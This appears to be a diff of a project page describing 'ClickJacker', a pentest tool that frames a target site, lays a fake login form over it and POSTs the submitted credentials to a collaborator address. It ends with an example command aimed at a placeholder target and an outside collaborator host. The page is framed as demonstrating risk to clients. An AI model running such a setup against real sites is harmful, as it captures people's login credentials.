← projects

 What it does

-Clickjacking works by exploiting a site that can be framed, and ClickJacker handles the setup.
-It frames the target to give the overlay some context, then drops a fake login form over the top.
-Credentials submitted through the overlay are POSTed to a collaborator address you supply, so you can demonstrate to a client exactly what an attacker would capture.
-Whether a target is actually vulnerable still requires some judgement on your part.
-Framebusting JavaScript and response headers can defeat framing in ways that are difficult to check automatically, so the tool gets the PoC in front of you and leaves the assessment to you.
+Whether a target is actually vulnerable still requires judgement on your part.
+Framebusting JavaScript and response headers can defeat framing in ways that are difficult to check automatically, so the tool puts the PoC on screen and leaves the assessment to you.

 clickjack https://app.acme.example https://x9k2.oastify.com